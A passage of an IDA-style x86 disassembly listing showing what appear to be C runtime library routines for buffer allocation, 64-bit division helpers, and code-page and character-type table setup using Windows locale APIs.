jz short loc_4079EB
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_4078B8
loc_4079EB: ; CODE XREF: sub_40786E+16F�j
mov dword_40E3F8, 1Ch
mov dword_40E3FC, edi
jmp short loc_407A13
; ---------------------------------------------------------------------------
loc_4079FD: ; CODE XREF: sub_40786E+FE�j
sub eax, [ebp+var_10]
jmp short loc_407A16
; ---------------------------------------------------------------------------
loc_407A02: ; CODE XREF: sub_40786E+15�j
; sub_40786E+37�j
and dword_40E3FC, 0
mov dword_40E3F8, 9
loc_407A13: ; CODE XREF: sub_40786E+120�j
; sub_40786E+166�j ...
or eax, 0FFFFFFFFh
loc_407A16: ; CODE XREF: sub_40786E+4C�j
; sub_40786E+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_40786E endp
; =============== S U B R O U T I N E =======================================
sub_407A1B proc near ; CODE XREF: sub_405802+6C�p
arg_0 = dword ptr 4
inc dword_40E664
push 1000h
call sub_40345E
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_407A44
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_407A55
; ---------------------------------------------------------------------------
loc_407A44: ; CODE XREF: sub_407A1B+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_407A55: ; CODE XREF: sub_407A1B+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_407A1B endp
; =============== S U B R O U T I N E =======================================
sub_407A5F proc near ; CODE XREF: sub_405802+61�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_410620
jb short loc_407A6E
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_407A6E: ; CODE XREF: sub_407A5F+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_410520[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_407A5F endp
; =============== S U B R O U T I N E =======================================
sub_407A85 proc near ; DATA XREF: seg001:0040B00C�o
mov eax, dword_410500
push esi
push 14h
test eax, eax
pop esi
jnz short loc_407A99
mov eax, 200h
jmp short loc_407A9F
; ---------------------------------------------------------------------------
loc_407A99: ; CODE XREF: sub_407A85+B�j
cmp eax, esi
jge short loc_407AA4
mov eax, esi
loc_407A9F: ; CODE XREF: sub_407A85+12�j
mov dword_410500, eax
loc_407AA4: ; CODE XREF: sub_407A85+16�j
push 4
push eax
call sub_408845
pop ecx
mov dword_40F4E8, eax
test eax, eax
pop ecx
jnz short loc_407AD8
push 4
push esi
mov dword_410500, esi
call sub_408845
pop ecx
mov dword_40F4E8, eax
test eax, eax
pop ecx
jnz short loc_407AD8
push 1Ah
call sub_4042F6
pop ecx
loc_407AD8: ; CODE XREF: sub_407A85+30�j
; sub_407A85+49�j
xor ecx, ecx
mov eax, offset off_40DEE0
loc_407ADF: ; CODE XREF: sub_407A85+6E�j
mov edx, dword_40F4E8
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset off_40E160
jl short loc_407ADF
xor edx, edx
mov ecx, offset dword_40DEF0
loc_407AFC: ; CODE XREF: sub_407A85+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword_410520[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_407B19
test eax, eax
jnz short loc_407B1C
loc_407B19: ; CODE XREF: sub_407A85+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_407B1C: ; CODE XREF: sub_407A85+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_40DF50
jl short loc_407AFC
pop esi
retn
sub_407A85 endp
; =============== S U B R O U T I N E =======================================
sub_407B2A proc near ; DATA XREF: seg001:0040B01C�o
; FUNCTION CHUNK AT 004088F6 SIZE 00000058 BYTES
call sub_4089E5
cmp byte_40E438, 0
jz short locret_407B3D
jmp loc_4088F6
; ---------------------------------------------------------------------------
locret_407B3D: ; CODE XREF: sub_407B2A+C�j
retn
sub_407B2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B3E proc near ; CODE XREF: sub_405917+2EA�p
; sub_405917+6FD�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_407B4A
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407B4A: ; CODE XREF: sub_407B3E+8�j
cmp dword_40E480, 0
jnz short loc_407B65
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_407B97
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407B65: ; CODE XREF: sub_407B3E+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_40DC8C
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_40E490
call dword_40A0B4 ; WideCharToMultiByte
test eax, eax
jz short loc_407B97
cmp [ebp+arg_0], 0
jz short loc_407BA4
loc_407B97: ; CODE XREF: sub_407B3E+1E�j
; sub_407B3E+51�j
mov dword_40E3F8, 2Ah
or eax, 0FFFFFFFFh
loc_407BA4: ; CODE XREF: sub_407B3E+57�j
pop ebp
retn
sub_407B3E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407BB0 proc near ; CODE XREF: sub_405917+60C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_407BD2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_407C13
; ---------------------------------------------------------------------------
loc_407BD2: ; CODE XREF: sub_407BB0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_407BE0: ; CODE XREF: sub_407BB0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_407BE0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_407C0E
cmp edx, [esp+8+arg_4]
ja short loc_407C0E
jb short loc_407C0F
cmp eax, [esp+8+arg_0]
jbe short loc_407C0F
loc_407C0E: ; CODE XREF: sub_407BB0+4E�j
; sub_407BB0+54�j
dec esi
loc_407C0F: ; CODE XREF: sub_407BB0+56�j
; sub_407BB0+5C�j
xor edx, edx
mov eax, esi
loc_407C13: ; CODE XREF: sub_407BB0+20�j
pop esi
pop ebx
retn 10h
sub_407BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407C20 proc near ; CODE XREF: sub_405917+5FA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_407C41
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_407C91
; ---------------------------------------------------------------------------
loc_407C41: ; CODE XREF: sub_407C20+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_407C4F: ; CODE XREF: sub_407C20+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_407C4F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_407C7A
cmp edx, [esp+4+arg_4]
ja short loc_407C7A
jb short loc_407C82
cmp eax, [esp+4+arg_0]
jbe short loc_407C82
loc_407C7A: ; CODE XREF: sub_407C20+4A�j
; sub_407C20+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_407C82: ; CODE XREF: sub_407C20+52�j
; sub_407C20+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_407C91: ; CODE XREF: sub_407C20+1F�j
pop ebx
retn 10h
sub_407C20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C95 proc near ; CODE XREF: sub_40617E+5E�p
; sub_4082AE+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40A5B8
push offset sub_403FB8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_40E668
xor ebx, ebx
cmp eax, ebx
jnz short loc_407D04
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_40A5B0
push esi
call dword_40A08C ; GetStringTypeW
test eax, eax
jz short loc_407CE2
mov eax, esi
jmp short loc_407CFF
; ---------------------------------------------------------------------------
loc_407CE2: ; CODE XREF: sub_407C95+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_40A5AC
push esi
push ebx
call dword_40A090 ; GetStringTypeA
test eax, eax
jz loc_407DCA
push 2
pop eax
loc_407CFF: ; CODE XREF: sub_407C95+4B�j
mov dword_40E668, eax
loc_407D04: ; CODE XREF: sub_407C95+2F�j
cmp eax, 2
jnz short loc_407D2D
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_407D15
mov eax, dword_40E480
loc_407D15: ; CODE XREF: sub_407C95+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_40A090 ; GetStringTypeA
jmp loc_407DCC
; ---------------------------------------------------------------------------
loc_407D2D: ; CODE XREF: sub_407C95+72�j
cmp eax, 1
jnz loc_407DCA
cmp [ebp+arg_10], ebx
jnz short loc_407D43
mov eax, dword_40E490
mov [ebp+arg_10], eax
loc_407D43: ; CODE XREF: sub_407C95+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_40A094 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_407DCA
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_403E90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_403AC0
add esp, 0Ch
jmp short loc_407D99
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_407D99: ; CODE XREF: sub_407C95+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_407DCA
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_40A094 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_407DCA
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_40A08C ; GetStringTypeW
jmp short loc_407DCC
; ---------------------------------------------------------------------------
loc_407DCA: ; CODE XREF: sub_407C95+61�j
; sub_407C95+9B�j ...
xor eax, eax
loc_407DCC: ; CODE XREF: sub_407C95+93�j
; sub_407C95+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_407C95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407DDE proc near ; CODE XREF: sub_406234+A3�p
; sub_4082AE+BE�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40A5C8
push offset sub_403FB8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_40E66C, edi
jnz short loc_407E54
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_40A5B0
mov esi, 100h
push esi
push edi
call dword_40A084 ; LCMapStringW
test eax, eax
jz short loc_407E32
mov dword_40E66C, ebx
jmp short loc_407E54
; ---------------------------------------------------------------------------
loc_407E32: ; CODE XREF: sub_407DDE+4A�j
push edi
push edi
push ebx
push offset dword_40A5AC
push esi
push edi
call dword_40A088 ; LCMapStringA
test eax, eax
jz loc_407F6C
mov dword_40E66C, 2
loc_407E54: ; CODE XREF: sub_407DDE+2E�j
; sub_407DDE+52�j
cmp [ebp+arg_C], edi
jle short loc_407E69
push [ebp+arg_C]
push [ebp+arg_8]
call sub_408002
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_407E69: ; CODE XREF: sub_407DDE+79�j
mov eax, dword_40E66C
cmp eax, 2
jnz short loc_407E90
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A088 ; LCMapStringA
jmp loc_407F6E
; ---------------------------------------------------------------------------
loc_407E90: ; CODE XREF: sub_407DDE+93�j
cmp eax, 1
jnz loc_407F6C
cmp [ebp+arg_18], edi
jnz short loc_407EA6
mov eax, dword_40E490
mov [ebp+arg_18], eax
loc_407EA6: ; CODE XREF: sub_407DDE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_40A094 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_407F6C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_403E90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_407F01
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_407F01: ; CODE XREF: sub_407DDE+10E�j
cmp [ebp+var_24], edi
jz short loc_407F6C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_40A094 ; MultiByteToWideChar
test eax, eax
jz short loc_407F6C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A084 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_407F6C
test byte ptr [ebp+arg_4+1], 4
jz short loc_407F80
cmp [ebp+arg_14], edi
jz loc_407FFB
cmp esi, [ebp+arg_14]
jg short loc_407F6C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A084 ; LCMapStringW
test eax, eax
jnz loc_407FFB
loc_407F6C: ; CODE XREF: sub_407DDE+66�j
; sub_407DDE+B5�j ...
xor eax, eax
loc_407F6E: ; CODE XREF: sub_407DDE+AD�j
; sub_407DDE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407F80: ; CODE XREF: sub_407DDE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_403E90
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_407FB4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_407FB4: ; CODE XREF: sub_407DDE+1C2�j
cmp ebx, edi
jz short loc_407F6C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A084 ; LCMapStringW
test eax, eax
jz short loc_407F6C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_407FDB
push edi
push edi
jmp short loc_407FE1
; ---------------------------------------------------------------------------
loc_407FDB: ; CODE XREF: sub_407DDE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_407FE1: ; CODE XREF: sub_407DDE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_40A0B4 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_407F6C
loc_407FFB: ; CODE XREF: sub_407DDE+165�j
; sub_407DDE+188�j
mov eax, esi
jmp loc_407F6E
sub_407DDE endp
; =============== S U B R O U T I N E =======================================
sub_408002 proc near ; CODE XREF: sub_407DDE+81�p
; sub_408BBE+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40801F
loc_408012: ; CODE XREF: sub_408002+1B�j
cmp byte ptr [eax], 0
jz short loc_40801F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_408012
loc_40801F: ; CODE XREF: sub_408002+E�j
; sub_408002+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40802A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40802A: ; CODE XREF: sub_408002+21�j
mov eax, edx
retn
sub_408002 endp
; =============== S U B R O U T I N E =======================================
sub_40802D proc near ; CODE XREF: sub_406550+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_40803E
add esp, 0Ch
retn
sub_40802D endp
; =============== S U B R O U T I N E =======================================
sub_40803E proc near ; CODE XREF: sub_40802D+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_40F3E1[eax], cl
jnz short loc_40806B
cmp [esp+arg_4], 0
jz short loc_408064
movzx eax, word_40DA8A[eax*2]
and eax, [esp+arg_4]
jmp short loc_408066
; ---------------------------------------------------------------------------
loc_408064: ; CODE XREF: sub_40803E+16�j
xor eax, eax
loc_408066: ; CODE XREF: sub_40803E+24�j
test eax, eax
jnz short loc_40806B
retn
; ---------------------------------------------------------------------------
loc_40806B: ; CODE XREF: sub_40803E+F�j
; sub_40803E+2A�j
push 1
pop eax
retn
sub_40803E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806F proc near ; CODE XREF: sub_408433+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_408208 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_40F2BC
mov [ebp+arg_0], esi
jz loc_4081FC
xor ebx, ebx
cmp esi, ebx
jz loc_4081F2
xor edx, edx
mov eax, offset dword_40E188
loc_4080A3: ; CODE XREF: sub_40806F+41�j
cmp [eax], esi
jz short loc_408119
add eax, 30h
inc edx
cmp eax, offset dword_40E278
jb short loc_4080A3
lea eax, [ebp+var_18]
push eax
push esi
call dword_40A080 ; GetCPInfo
cmp eax, 1
jnz loc_4081EA
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_40F3E0
cmp [ebp+var_18], 1
mov dword_40F2BC, esi
rep stosd
stosb
mov dword_40F4E4, ebx
jbe loc_4081D8
cmp [ebp+var_12], 0
jz loc_4081AE
lea ecx, [ebp+var_11]
loc_4080F6: ; CODE XREF: sub_40806F+139�j
mov dl, [ecx]
test dl, dl
jz loc_4081AE
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_408107: ; CODE XREF: sub_40806F+A8�j
cmp eax, edx
ja loc_4081A2
or byte_40F3E1[eax], 4
inc eax
jmp short loc_408107
; ---------------------------------------------------------------------------
loc_408119: ; CODE XREF: sub_40806F+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_40F3E0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_40E198[esi]
loc_408135: ; CODE XREF: sub_40806F+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_408168
loc_40813C: ; CODE XREF: sub_40806F+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_408168
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_408161
mov edx, [ebp+var_4]
mov dl, byte_40E180[edx]
loc_408156: ; CODE XREF: sub_40806F+F0�j
or byte_40F3E1[eax], dl
inc eax
cmp eax, edi
jbe short loc_408156
loc_408161: ; CODE XREF: sub_40806F+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_40813C
loc_408168: ; CODE XREF: sub_40806F+CB�j
; sub_40806F+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_408135
mov eax, [ebp+arg_0]
mov dword_40F2CC, 1
push eax
mov dword_40F2BC, eax
call sub_408252
lea esi, dword_40E18C[esi]
mov edi, offset dword_40F2C0
movsd
movsd
pop ecx
mov dword_40F4E4, eax
movsd
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40806F+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_4080F6
loc_4081AE: ; CODE XREF: sub_40806F+7E�j
; sub_40806F+8B�j
push 1
pop eax
loc_4081B1: ; CODE XREF: sub_40806F+14F�j
or byte_40F3E1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4081B1
push esi
call sub_408252
pop ecx
mov dword_40F4E4, eax
mov dword_40F2CC, 1
jmp short loc_4081DE
; ---------------------------------------------------------------------------
loc_4081D8: ; CODE XREF: sub_40806F+74�j
mov dword_40F2CC, ebx
loc_4081DE: ; CODE XREF: sub_40806F+167�j
xor eax, eax
mov edi, offset dword_40F2C0
stosd
stosd
stosd
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081EA: ; CODE XREF: sub_40806F+51�j
cmp dword_40E670, ebx
jz short loc_408200
loc_4081F2: ; CODE XREF: sub_40806F+27�j
call sub_408285
loc_4081F7: ; CODE XREF: sub_40806F+131�j
; sub_40806F+179�j
call sub_4082AE
loc_4081FC: ; CODE XREF: sub_40806F+1D�j
xor eax, eax
jmp short loc_408203
; ---------------------------------------------------------------------------
loc_408200: ; CODE XREF: sub_40806F+181�j
or eax, 0FFFFFFFFh
loc_408203: ; CODE XREF: sub_40806F+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_40806F endp
; =============== S U B R O U T I N E =======================================
sub_408208 proc near ; CODE XREF: sub_40806F+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_40E670, 0
cmp eax, 0FFFFFFFEh
jnz short loc_408228
mov dword_40E670, 1
jmp dword_40A078
; ---------------------------------------------------------------------------
loc_408228: ; CODE XREF: sub_408208+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_40823D
mov dword_40E670, 1
jmp dword_40A07C
; ---------------------------------------------------------------------------
loc_40823D: ; CODE XREF: sub_408208+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_408251
mov eax, dword_40E490
mov dword_40E670, 1
locret_408251: ; CODE XREF: sub_408208+38�j
retn
sub_408208 endp
; =============== S U B R O U T I N E =======================================
sub_408252 proc near ; CODE XREF: sub_40806F+118�p
; sub_40806F+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_40827F
sub eax, 4
jz short loc_408279
sub eax, 0Dh
jz short loc_408273
dec eax
jz short loc_40826D
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40826D: ; CODE XREF: sub_408252+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_408273: ; CODE XREF: sub_408252+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_408279: ; CODE XREF: sub_408252+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_40827F: ; CODE XREF: sub_408252+9�j
mov eax, 411h
retn
sub_408252 endp
; =============== S U B R O U T I N E =======================================
sub_408285 proc near ; CODE XREF: sub_40806F:loc_4081F2�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_40F3E0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_40F2C0
mov dword_40F2BC, eax
mov dword_40F2CC, eax
mov dword_40F4E4, eax
stosd
stosd
stosd
pop edi
retn
sub_408285 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082AE proc near ; CODE XREF: sub_40806F:loc_4081F7�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_40F2BC
call dword_40A080 ; GetCPInfo
cmp eax, 1
jnz loc_4083E7
xor eax, eax
mov esi, 100h
loc_4082D8: ; CODE XREF: sub_4082AE+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_4082D8
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_408329
push ebx
push edi
lea edx, [ebp+var_D]
loc_4082F7: ; CODE XREF: sub_4082AE+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_40831E
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_40831E: ; CODE XREF: sub_4082AE+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_4082F7
pop edi
pop ebx
loc_408329: ; CODE XREF: sub_4082AE+42�j
push 0
lea eax, [ebp+var_514]
push dword_40F4E4
push dword_40F2BC
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_407C95
push 0
lea eax, [ebp+var_214]
push dword_40F2BC
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_40F4E4
call sub_407DDE
push 0
lea eax, [ebp+var_314]
push dword_40F2BC
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_40F4E4
call sub_407DDE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_4083A4: ; CODE XREF: sub_4082AE+135�j
mov dx, [ecx]
test dl, 1
jz short loc_4083C2
or byte_40F3E1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_4083BA: ; CODE XREF: sub_4082AE+127�j
mov byte_40F2E0[eax], dl
jmp short loc_4083DE
; ---------------------------------------------------------------------------
loc_4083C2: ; CODE XREF: sub_4082AE+FC�j
test dl, 2
jz short loc_4083D7
or byte_40F3E1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_4083BA
; ---------------------------------------------------------------------------
loc_4083D7: ; CODE XREF: sub_4082AE+117�j
and byte_40F2E0[eax], 0
loc_4083DE: ; CODE XREF: sub_4082AE+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_4083A4
jmp short loc_408430
; ---------------------------------------------------------------------------
loc_4083E7: ; CODE XREF: sub_4082AE+1D�j
xor eax, eax
mov esi, 100h
loc_4083EE: ; CODE XREF: sub_4082AE+180�j
cmp eax, 41h
jb short loc_40840C
cmp eax, 5Ah
ja short loc_40840C
or byte_40F3E1[eax], 10h
mov cl, al
add cl, 20h
loc_408404: ; CODE XREF: sub_4082AE+174�j
mov byte_40F2E0[eax], cl
jmp short loc_40842B
; ---------------------------------------------------------------------------
loc_40840C: ; CODE XREF: sub_4082AE+143�j
; sub_4082AE+148�j
cmp eax, 61h
jb short loc_408424
cmp eax, 7Ah
ja short loc_408424
or byte_40F3E1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_408404
; ---------------------------------------------------------------------------
loc_408424: ; CODE XREF: sub_4082AE+161�j
; sub_4082AE+166�j
and byte_40F2E0[eax], 0
loc_40842B: ; CODE XREF: sub_4082AE+15C�j
inc eax
cmp eax, esi
jb short loc_4083EE
loc_408430: ; CODE XREF: sub_4082AE+137�j
pop esi
leave
retn
sub_4082AE endp
; =============== S U B R O U T I N E =======================================
sub_408433 proc near ; CODE XREF: sub_406550+9�p
; sub_4065A8+D�p ...
cmp dword_410650, 0
jnz short locret_40844E
push 0FFFFFFFDh
call sub_40806F
